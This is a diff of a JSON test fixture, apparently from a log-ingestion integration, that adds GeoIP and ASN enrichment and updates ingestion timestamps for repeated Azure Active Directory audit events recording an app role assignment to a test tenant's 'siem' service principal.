APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -5371,6 +5719,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -5537,7 +5897,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125003300Z", + "ingested": "2021-12-14T14:48:43.176655198Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -5564,6 +5924,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -5730,7 +6102,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125008800Z", + "ingested": "2021-12-14T14:48:43.176655928Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -5757,6 +6129,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -5923,7 +6307,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125014300Z", + "ingested": "2021-12-14T14:48:43.176656586Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -5950,6 +6334,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -6116,7 +6512,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125018800Z", + "ingested": "2021-12-14T14:48:43.176657220Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
